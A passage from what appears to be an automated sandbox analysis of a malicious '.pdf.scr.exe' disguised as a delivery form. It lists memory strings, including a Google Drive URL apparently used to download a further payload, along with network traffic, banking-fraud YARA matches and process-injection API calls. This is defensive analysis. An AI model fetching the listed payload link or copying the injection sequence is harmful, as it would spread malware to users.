00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmp; Strings found in binary or memory (same source set for all four):
                          http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          http://crl.comodoca.com/AAACertificateServices.crl04
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818945720.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1772442909.000000007EBFA000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000779000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2456357700.0000000004ACC000.00000004.10000000.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282511717.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2915059830.0000000036E6C000.00000004.80000000.00040000.00000000.sdmp, dxobknwL.pif.0.dr
String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
String found in binary or memory: http://ocsp.comodoca.com0
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818945720.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1772442909.000000007EBFA000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000779000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2456357700.0000000004ACC000.00000004.10000000.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282511717.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2915059830.0000000036E6C000.00000004.80000000.00040000.00000000.sdmp, dxobknwL.pif.0.dr
String found in binary or memory: http://ocsp.comodoca.com0$
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://ocsp.digicert.com0A
String found in binary or memory: http://ocsp.digicert.com0C
String found in binary or memory: http://ocsp.digicert.com0X
String found in binary or memory: http://ocsp.sectigo.com0
String found in binary or memory: http://ocsp.sectigo.com0C
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Lwnkboxd.PIF.0.dr
String found in binary or memory: http://programania.com/en.htm
String found in binary or memory: http://programania.com/en.zip
String found in binary or memory: http://programania.com/en_source.zip
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000000.1670631490.000000000055C000.00000002.00000001.01000000.00000003.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1673538972.000000007F312000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1770113864.0000000021B64000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002579000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1673538972.000000007F1C8000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: http://programania.com/index_ru.htm
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818945720.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1772442909.000000007EBFA000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000779000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2456357700.0000000004ACC000.00000004.10000000.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282511717.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2915059830.0000000036E6C000.00000004.80000000.00040000.00000000.sdmp, dxobknwL.pif.0.dr
String found in binary or memory: http://www.pmail.com0
Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.000000000069E000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://drive.google.com/
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000259D000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: https://drive.google.com/uc?expo
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000256A000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: https://drive.google.com/uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.000000000069E000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://drive.google.com/uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy31127I
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.0000000000721000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://drive.usercontent.google.com/P0
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=download
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=download4S
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=downloadq
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=downlo
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: proquota.exe, 00000010.00000003.2391150893.000000000772F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: proquota.exe, 00000010.00000002.2456357700.0000000004EB4000.00000004.10000000.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000013.00000002.2916952193.0000000002FE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2915059830.0000000037254000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: Yara matchFile source: Process Memory Space: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe PID: 6600, type: MEMORYSTR

                      E-Banking Fraud

                      Source: Yara match | File source: 14.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.2271670013.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.2236634830.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.2284786818.0000000034AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.2212491351.0000000029F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.2916624441.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.2916429816.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2455645977.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: initial sample | Static PE information: Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02948254 NtReadVirtualMemory,0_2_02948254
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_029484C4 NtUnmapViewOfSection,0_2_029484C4
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0294DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,0_2_0294DACC
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0294DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_0294DA44
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0294DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0294DBB0
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02948BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02948BB0
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_029479B4 NtAllocateVirtualMemory,0_2_029479B4
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02947D00 NtWriteVirtualMemory,0_2_02947D00
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02948BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02948BAE
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_029479B2 NtAllocateVirtualMemory,0_2_029479B2
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0294D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_0294D9F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_0042CB13 NtClose,3_2_0042CB13
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082B60 NtClose,LdrInitializeThunk,3_2_2A082B60
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_2A082C70
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_2A082DF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0835C0 NtCreateMutant,LdrInitializeThunk,3_2_2A0835C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082AB0 NtWaitForSingleObject,3_2_2A082AB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082AD0 NtReadFile,3_2_2A082AD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082AF0 NtWriteFile,3_2_2A082AF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082B80 NtQueryInformationFile,3_2_2A082B80
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082BA0 NtEnumerateValueKey,3_2_2A082BA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082BE0 NtQueryValueKey,3_2_2A082BE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082BF0 NtAllocateVirtualMemory,3_2_2A082BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082E30 NtWriteVirtualMemory,3_2_2A082E30
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082E80 NtReadVirtualMemory,3_2_2A082E80
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082EA0 NtAdjustPrivilegesToken,3_2_2A082EA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082EE0 NtQueueApcThread,3_2_2A082EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082F30 NtCreateSection,3_2_2A082F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082F60 NtCreateProcessEx,3_2_2A082F60
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082F90 NtProtectVirtualMemory,3_2_2A082F90
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082FA0 NtQuerySection,3_2_2A082FA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082FB0 NtResumeThread,3_2_2A082FB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082FE0 NtCreateFile,3_2_2A082FE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082C00 NtQueryInformationProcess,3_2_2A082C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082C60 NtCreateKey,3_2_2A082C60
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082CA0 NtQueryInformationToken,3_2_2A082CA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082CC0 NtQueryVirtualMemory,3_2_2A082CC0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082CF0 NtOpenProcess,3_2_2A082CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082D00 NtSetInformationFile,3_2_2A082D00
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082D10 NtMapViewOfSection,3_2_2A082D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082D30 NtUnmapViewOfSection,3_2_2A082D30
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082DB0 NtEnumerateKey,3_2_2A082DB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A082DD0 NtDelayExecution,3_2_2A082DD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A084340 NtSetContextThread,3_2_2A084340
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A084650 NtSuspendThread,3_2_2A084650
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0839B0 NtGetContextThread,3_2_2A0839B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A083D10 NtOpenProcessToken,3_2_2A083D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A083D70 NtOpenThread,3_2_2A083D70
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A083010 NtOpenDirectoryObject,3_2_2A083010
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A083090 NtSetValueKey,3_2_2A083090
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_02888254 NtReadVirtualMemory,5_2_02888254
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_028884C4 NtUnmapViewOfSection,5_2_028884C4
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_0288DACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,5_2_0288DACC
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_0288DA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,5_2_0288DA44
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_02888BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,5_2_02888BB0
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_0288DBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,5_2_0288DBB0
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_028879B4 NtAllocateVirtualMemory,5_2_028879B4
